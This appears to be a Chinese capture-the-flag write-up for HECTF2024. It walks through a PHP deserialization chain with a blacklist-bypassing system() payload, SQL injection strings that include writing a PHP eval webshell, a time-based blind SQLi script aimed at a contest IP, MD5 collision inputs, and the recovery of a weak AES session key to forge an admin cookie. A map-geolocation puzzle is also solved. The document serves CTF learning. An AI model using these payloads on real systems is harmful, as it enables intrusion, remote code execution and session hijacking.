HECTF2024

HECTF2024 web

baby_unserialize

分析过程:

<?php


// Challenge as served: errors hidden, the full source echoed back to the
// visitor (so the gadget classes below are public), and the flag path
// announced. The flag is obtained through the deserialization chain below.
error_reporting(0);

show_source(__FILE__);
echo "flag in /flag</br>";

class User{
    public $name;
    public $passwd;
    public $msg;
    public $token = "guest";
    public function __construct($name,$passwd){
        $this->name = $name;
        $this->passwd = $passwd;
    }

    // Runs on unserialize() and demotes the token, so a payload carrying
    // token = "admin" must get __wakeup() skipped. The writeup's payload does
    // that by declaring more properties than it contains; NOTE(review): that
    // skip is the property-count bug fixed in PHP 5.6.25 / 7.0.10
    // (CVE-2016-7124) — confirm the target's PHP version.
    public function __wakeup(){
        $this->token = "guest";
    }

    // Chain entry (step 4 in the writeup's sink-to-source numbering): when the
    // object is freed, check() must pass, and `echo $this->msg` string-converts
    // $msg — a class01 instance there reaches class01::__tostring().
    public function __destruct(){
        if(!$this->check()){
            exit(0);
        }else{
            echo $this->msg;
        }
    }

    // Strict comparison: only the exact string "admin" passes.
    public function check(){
        if ($this->token === "admin"){
            return true;
        }else{
            return false;
        }
    }

}

class class00{
    // Any undefined method call returns 1. class01::__tostring() calls
    // $this->cls->func1() and requires the result to be === 1, so a class00
    // instance in class01::$cls satisfies that check.
    public function __call($a,$b){
        return 1;
    }
    // Writing an undefined property invokes the assigned value (step 2):
    // class01 assigns its $str3 to $cls->str1, so with $str3 set to a class02
    // instance this call reaches class02::__invoke().
    public function __set($a, $b){
        $b();
    }

}


class class01{
    public $temp = 0;
    public $str3;
    public $cls;

    // Reached when a class01 instance is echoed (User::__destruct). Step 3 of
    // the chain: with $cls = class00, func1() resolves through __call and
    // returns 1; the following write to the undefined property $cls->str1
    // goes through class00::__set, which calls $str3 — a class02 instance.
    public function __tostring(){
        $this->temp = $this->cls->func1();
        if ($this->temp === 1){
            $this->cls->str1 = $this->str3;
        }else{
            echo "0";
            return "0";
        }

        return "have fun";
    }
}

class class02{
    public $payload;
    // Step 1, the sink: a case-insensitive substring blacklist, then system()
    // with the command's stdout and stderr sent to /dev/null. For a payload
    // this means: every listed word (flag, cat, ls, sh, env, id, ...) and the
    // characters = . ; $ ` ? * " ' \ { } are unusable anywhere in the command;
    // "join" contains no listed substring, and "/fla[a-z]" reaches /flag by
    // shell globbing without spelling it. Output only comes back if the
    // command detaches from the appended redirection — the writeup's command
    // ends in "&", so ">/dev/null 2>&1" applies to an empty command.
    public function __invoke(){
        if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|;|date|bash|\$|\x00|`|env|\?|wget|\"|\'|\\\|php|id|whoami|=/i', $this->payload)) {
            system($this->payload." >/dev/null 2>&1");
        }else{
            die("fuck you Hacker");
        }
    }
}



    // Author's local test payload. The property count is declared as 5 while
    // only 4 members follow (name, passwd, msg, token): that mismatch is the
    // __wakeup() skip referred to above, and it only works on PHP builds
    // before the property-count fix (5.6.25 / 7.0.10) — confirm the target.
    // NOTE(review): this particular command would not pass class02's
    // blacklist — both "=" and "env" (inside "environ") match — and its
    // output would be swallowed by the appended ">/dev/null 2>&1"; the
    // working command is the join/glob one generated by the script below.
    // Running this file locally executes the chain, i.e. system(), on the
    // machine that runs it.
    $pay='O:4:"User":5:{s:4:"name";N;s:6:"passwd";N;s:3:"msg";O:7:"class01":3:{s:4:"temp";i:1;s:4:"str3";O:7:"class02":1:{s:7:"payload";s:21:"dd if=/proc/1/environ";}s:3:"cls";O:7:"class00":0:{}}s:5:"token";s:5:"admin";}';
    $user = unserialize($pay);


<?php


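error_reporting(0);

// Method-less stand-ins for the target's classes. Only the class names and
// public properties matter for serialize(); leaving out __destruct,
// __tostring, __set and __invoke means building the chain here does not
// trigger any of the target's magic methods on this machine.
class User{
    public $name;
    public $passwd;
    public $msg;
    public $token;
}

class class00{
}

class class01{
    public $temp = 0;
    public $str3;
    public $cls;
}

class class02{
    public $payload;
}

/**
 * Local copy of the blacklist in class02::__invoke() (regex copied verbatim
 * from the challenge source). Returns true when $cmd would reach system().
 */
function passes_filter(string $cmd): bool
{
    return !preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|;|date|bash|\$|\x00|`|env|\?|wget|\"|\'|\\\|php|id|whoami|=/i', $cmd);
}

/**
 * Serialize the gadget chain that makes the target execute $cmd:
 *   User (token = "admin", msg = class01)
 *   -> User::__destruct echoes $msg -> class01::__tostring
 *   -> $cls (class00) answers func1() with 1 via __call
 *   -> assigning $str3 to the undefined $cls->str1 hits class00::__set
 *   -> __set calls $str3, a class02, whose __invoke runs system($cmd ...).
 *
 * The declared property count of User is raised from 4 to 5 so that
 * __wakeup(), which would reset token to "guest", is skipped. That skip is
 * the property-count bug fixed in PHP 5.6.25 / 7.0.10 (CVE-2016-7124); on a
 * patched PHP the payload simply fails to unserialize — confirm the target.
 *
 * @param string $cmd shell command; the sink appends " >/dev/null 2>&1"
 * @return string serialized payload
 * @throws InvalidArgumentException when $cmd would be rejected by the blacklist
 */
function build_payload(string $cmd): string
{
    if (!passes_filter($cmd)) {
        throw new InvalidArgumentException("command would be rejected by the blacklist: $cmd");
    }

    $user = new User();
    $user->token = "admin";
    $user->msg = new class01();
    $user->msg->temp = 1;
    $user->msg->cls = new class00();
    $user->msg->str3 = new class02();
    $user->msg->str3->payload = $cmd;

    // serialize() writes the true member count (4); declare one more.
    return preg_replace('/^O:4:"User":4:/', 'O:4:"User":5:', serialize($user), 1);
}

// "join" contains none of the blacklisted substrings, "/fla[a-z]" reaches
// /flag by shell globbing without spelling the word, and the trailing "&"
// ends the command before the appended ">/dev/null 2>&1", which then applies
// to an empty command, so join's output is returned in the response.
echo build_payload("join -a 2 /dev/null /fla[a-z] &");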

//O:4:"User":4:{s:4:"name";N;s:6:"passwd";N;s:3:"msg";O:7:"class01":3:{s:4:"temp";i:1;s:4:"str3";O:7:"class02":1:{s:7:"payload";s:33:"join -a 2 /dev/null /etc/passwd &";}s:3:"cls";O:7:"class00":0:{}}s:5:"token";s:5:"admin";}
//（上面这串是命令为 "join -a 2 /dev/null /etc/passwd &" 时的输出，s:33 对应的是 /etc/passwd 版本；脚本里实际使用的命令是 /fla[a-z]。）

join 命令可以读取文件，且 "join" 不含黑名单中的任何子串；/fla[a-z] 利用 shell 通配符匹配 /flag，避开了被过滤的 flag 关键字；命令末尾的 & 使其在拼接的 >/dev/null 2>&1 之前结束（该重定向只作用于后面的空命令），输出才会回显。另外脚本生成的 O:4:"User":4: 需改为 :5:（同上面的 payload）以跳过 __wakeup，该技巧依赖旧版 PHP（5.6.25 / 7.0.10 之前）的属性数量不匹配缺陷。

funny(misc)

第一张图片可以查jk fun百度地图找到是西外文化休闲广场

https://baijiahao.baidu.com/s?id=1807538314504083224

第二三张图主要根据拱桥,找到这个网址

https://beijing.qianlong.com/2022/0815/7523307.shtml

打开卫星地图

右侧有桥,左侧有蓝房子

HECTF{北京市-西城区-西外文化休闲广场-京城水系慈禧水道}

baby_sql

万能密码登录,跳转到worker.php

经测试有3列,过滤了['update', 'delete', 'drop', 'insert', 'join', 'hex', 'CHAR', 'information', 'updatexml', ' ', '--', '=', '<', '>']

位置均可回显

-Bob'%0Cunion%0Cselect%0C888,database(),666%23	----> 	workers

-Bob'%0Cunion%0Cselect%0C888,(group_concat(table_name)),666%0Cfrom%0Cmysql.innodb_table_stats%0Cwhere%0Cdatabase_name%0Clike%0Cdatabase()%23

-Bob'%0Cunion select 1,2,"<?php @eval($_POST['cmd']);?>" into outfile "/var/www/html/1.php"%23	（写 webshell 需要数据库账号有 FILE 权限、secure_file_priv 未限制该目录，且 mysqld 进程对 web 目录可写；注意此行含有空格，而上面列出空格被过滤，实际发送时需用 %0C 之类替换）

0x09 对等号=的绕过

不带通配符的 like 与 = 效果基本一致，可用来绕过对 = 的过滤；但有两点需注意：like 在默认的 _ci 排序规则下不区分大小写（逐字符盲注时应用 like binary，否则会先命中大写字母），且被比较值中的 % 与 _ 仍是通配符，需转义为 \% 与 \_。

时间盲注脚本(服务器报错远程主机强迫关闭了一个现有的连接,做不出来...)

import random
import requests
import time
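# Shared session for the blind-injection probes.
# NOTE(review): the original `requests.adapters.DEFAULT_RETRIES = 5` and
# `conn.keep_alive = False` lines were no-ops — HTTPAdapter binds
# DEFAULT_RETRIES as a default argument when adapters.py is imported, and
# Session has no keep_alive attribute. Mount an adapter with the retry count
# and ask the server to close each connection instead; both matter here
# because the target kept resetting connections.
conn = requests.Session()
_adapter = requests.adapters.HTTPAdapter(max_retries=5)
conn.mount("http://", _adapter)
conn.mount("https://", _adapter)
conn.headers["Connection"] = "close"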

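_SLOW_SECONDS = 2.0   # true branch sleeps 10 s, false branch 0 s; margin for latency
_PAUSE_SECONDS = 0.5  # gap between probes, as in the original (target dropped connections)
# LIKE treats % and _ as wildcards and a bare quote would end the literal;
# backslash is MySQL's default escape (not under NO_BACKSLASH_ESCAPES — confirm).
_LIKE_ESCAPES = {"%": "\\%", "_": "\\_", "'": "\\'", "\\": "\\\\\\\\"}


def _like_literal(ch):
    """Escape one character for use inside a single-quoted LIKE pattern."""
    return _LIKE_ESCAPES.get(ch, ch)


def _is_slow(url, payload, attempts=3):
    """POST one probe as the ``name`` field; True if the response exceeded the threshold.

    A dropped connection says nothing about the injected condition, so the
    probe is re-sent up to ``attempts`` times before giving up.
    """
    for _ in range(attempts):
        time.sleep(_PAUSE_SECONDS)
        started = time.monotonic()
        try:
            conn.post(url=url, data={"name": payload})
        except requests.exceptions.ConnectionError:
            continue
        return time.monotonic() - started > _SLOW_SECONDS
    raise RuntimeError("probe failed %d times: %s" % (attempts, payload))


def getName(url):
    """Recover the current database name by time-based blind injection.

    The target strips spaces, ``=``, ``<``, ``>`` and several keywords, so
    the payloads use ``/**/`` as whitespace and ``LIKE`` in place of ``=``.
    A true condition makes the server ``sleep(10)``; a response slower than
    ``_SLOW_SECONDS`` is read as true.

    Fixes relative to the original: the character probe interpolated the
    code point (e.g. 65) instead of the character, so no position could
    ever match; LIKE wildcards are escaped; ``like binary`` is used so the
    case-insensitive default collation does not report lowercase letters as
    their uppercase form (``A`` is probed before ``a``).

    Args:
        url: the injectable endpoint (POST parameter ``name``).
    Returns:
        the database name, or ``""`` if its length could not be determined.
    """
    print("开始获取长度...")
    name_len = 0
    for candidate in range(1, 99):
        payload = ("a'/**/or/**/if((select/**/length(database()))/**/like/**/{},"
                   "sleep(10),sleep(0))#").format(candidate)
        if _is_slow(url, payload):
            print("数据库名长度为:" + str(candidate))
            name_len = candidate
            break
    print("开始获取名...")
    db_name = ""
    for pos in range(1, name_len + 1):
        for code in range(33, 127):
            payload = ("a'/**/Or/**/if(substr(database(),{},1)/**/like/**/binary/**/'{}',"
                       "sLeep(10),sLeep(0))#").format(pos, _like_literal(chr(code)))
            if _is_slow(url, payload):
                db_name += chr(code)
                print(db_name)
                break
    return db_name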

if __name__ == "__main__":
    # worker.php is the page reached after the universal-password login.
    url = "http://101.132.58.9:31298/worker.php"
    name = getName(url)
    print(name)

非预期:

主页面sqlmap打时间盲注

ezweb

注释源码

// Challenge gate: three checks on GET parameters.
//  1. a != b but md5(a) == md5(b): loose comparison — two different inputs
//     whose digests both look like "0e<digits>" compare equal as float 0.
//  2. c != d but md5(c) === md5(d): strict comparison — needs a genuine MD5
//     collision pair (two different byte strings with an identical digest).
//  3. md5(guess) must equal a fixed digest; the hint "xxxxx2024" says the
//     plaintext is five unknown characters followed by 2024 (brute-forced
//     by the script below).
if($_GET['a'] != $_GET['b'] && md5($_GET['a']) == md5($_GET['b'])) {
    if ($_GET['c'] != $_GET['d'] && md5($_GET['c']) === md5($_GET['d'])) {
        if (isset($_GET['guess']) && md5($_GET['guess']) === 'aa476cf7143fe69c29b36e4d0a793604') { //xxxxx2024
            highlight_file("secret.php");
        }
    }
}

经典 md5：a/b 为 0e 开头的"魔术哈希"——md5 值形如 0e<纯数字>，== 弱比较时按数值 0 相等；c/d 是一对 md5 碰撞（两段仅差几个字节的二进制数据，摘要完全相同），满足 === 强比较；guess 由下面脚本按 xxxxx2024 的格式爆破得到。

a=QNKCDZO&
b=240610708
&c=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&d=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
&guess=hECTf2024

暴力破解脚本

import hashlib
import itertools
import string

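def md5_decrypt(target_md5, suffix="2024", length=5,
                characters=string.ascii_letters + string.digits):
    """Brute-force the prefix of ``<prefix><suffix>`` whose MD5 is ``target_md5``.

    The challenge's comment ``//xxxxx2024`` gives the shape: an unknown
    5-character prefix followed by ``2024``. Candidates are tried in the
    same order as the original nested loops (lowercase, uppercase, digits;
    leftmost position varies slowest), so results for the default arguments
    are unchanged. The full space for the defaults is 62**5 candidates, so
    a full run can take a long time.

    Args:
        target_md5: hex digest to match (either case).
        suffix: known trailing part of the plaintext.
        length: number of unknown leading characters.
        characters: alphabet for the unknown part.
    Returns:
        the full plaintext, or the string ``"Not found"`` when the space is
        exhausted (kept for compatibility with the original script).
    """
    target = target_md5.strip().lower()
    for combo in itertools.product(characters, repeat=length):
        plaintext = "".join(combo) + suffix
        if hashlib.md5(plaintext.encode("utf-8")).hexdigest() == target:
            return plaintext
    return "Not found"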

# Digest from the challenge's `md5($_GET['guess']) === '...'` check; the
# search space is five alphanumerics followed by "2024", so expect a long run.
target_md5 = "aa476cf7143fe69c29b36e4d0a793604"
decrypted_data = md5_decrypt(target_md5)
print("MD5 decrypted data: {}".format(decrypted_data))

hECTf2024

//secret.php
<?php
error_reporting(0);
// Key derivation hinted by the challenge (left commented out in its source):
// the Mersenne Twister is seeded with rand(1e5,1e7) and the key is the next
// rand(), i.e. one of at most 9,900,001 seeds — small enough to replay every
// seed against a captured token, which is what the script below does.
//mt_srand(rand(1e5,1e7));
//$key = rand();
//file_put_contents(*,$key);
/**
 * Decrypt a session token: base64 -> IV || ciphertext, AES-256-CBC.
 * The options value 1 is OPENSSL_RAW_DATA (the ciphertext part is raw bytes,
 * not base64). Returns false when decryption or the padding check fails.
 *
 * Key strength: per the commented-out lines above, $key is the first rand()
 * after mt_srand(rand(1e5,1e7)), so the effective key space is the seed
 * space. An integer key is string-cast here; NOTE(review): PHP is expected
 * to pad a key shorter than 32 bytes with NUL bytes — confirm on the target's
 * PHP version.
 */
function session_decrypt($session,$key){
    $data = base64_decode($session);
    $method = 'AES-256-CBC';
    $iv_size = openssl_cipher_iv_length($method);
    $iv = substr($data,0,$iv_size);
    $enc = substr($data,$iv_size);
    return openssl_decrypt($enc, $method, $key, 1, $iv);
}

暴力破解

<?php
// Hide warnings/notices during the brute force (mirrors the challenge source).
error_reporting(0);
//file_put_contents(*,$key);
/**
 * Decrypt a session token produced as base64(IV || AES-256-CBC ciphertext).
 * The IV is split off by the cipher's IV length; the rest is decrypted as
 * raw bytes (OPENSSL_RAW_DATA). Returns false when the key is wrong (bad
 * padding) or the input is malformed.
 */
function session_decrypt($session,$key){
    $cipher = 'AES-256-CBC';
    $ivLen = openssl_cipher_iv_length($cipher);
    $raw = base64_decode($session);
    $iv = substr($raw, 0, $ivLen);
    $ciphertext = substr($raw, $ivLen);
    return openssl_decrypt($ciphertext, $cipher, $key, OPENSSL_RAW_DATA, $iv);
}

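/**
 * Recover the session key by replaying every seed the challenge could have
 * used: secret.php seeds with mt_srand(rand(1e5,1e7)) and takes $key = rand(),
 * so the candidates are the integers in [$from, $to]. A candidate is accepted
 * when decryption succeeds and the plaintext contains $needle.
 *
 * NOTE(review): rand() only follows mt_srand() on PHP >= 7.1, where it is an
 * alias of mt_rand() — run this on a PHP matching the target. A plaintext
 * that merely contains "guest" by chance is unlikely but possible, so the
 * whole decrypted object is printed for inspection.
 *
 * @return array{key:int,seed:int,plain:string}|null first hit, or null
 */
function recover_session_key(string $token, int $from = 100000, int $to = 10000000, string $needle = 'guest'): ?array
{
    for ($seed = $from; $seed <= $to; $seed++) {
        mt_srand($seed);
        $key = rand();
        $plain = session_decrypt($token, $key);
        if ($plain !== false && strpos($plain, $needle) !== false) {
            return ['key' => $key, 'seed' => $seed, 'plain' => $plain];
        }
    }
    return null;
}

// Cookie value as captured from the browser: still URL-encoded, so decode it
// before the base64 layer.
$token='IMP%2Fa7nAmviTRolzhTvySinG%2FX7FUmJ%2FzYKCPHUu6a52%2BcLCYXoI5rOOOkg5iZRo6qSII44QXSEpLmAHhm9boPAQZ8FUbqKPyKNOChhOiPdxS0%2FMMaAozJBAC5eKI0kX';
$token = urldecode($token);
$hit = recover_session_key($token);
if ($hit === null) {
    echo "no key found in seed range\n";
} else {
    echo $hit['plain'], "\n";
    echo "key=", $hit['key'], " (seed ", $hit['seed'], ")\n";
}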

结果O:4:"User":2:{s:8:"username";s:5:"guest";s:4:"role";s:5:"guest";} key=385780431

/**
 * Inverse of session_decrypt(): AES-256-CBC with a fresh random IV, returned
 * as base64(IV || ciphertext) so the decrypt side can split the IV off by
 * the cipher's IV length. Each call yields a different token for the same
 * input because the IV is random.
 */
function session_encrypt($message,$key){
    $cipher = 'AES-256-CBC';
    $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length($cipher));
    $ciphertext = openssl_encrypt($message, $cipher, $key, OPENSSL_RAW_DATA, $iv);
    return base64_encode($iv . $ciphertext);
}

// Forge a session with role flipped to "admin" under the key recovered above
// (the decrypted token had role "guest"). The IV is random, so the printed
// token differs per run; every such token decrypts to the same object.
var_dump(session_encrypt('O:4:"User":2:{s:8:"username";s:5:"guest";s:4:"role";s:5:"admin";}',385780431));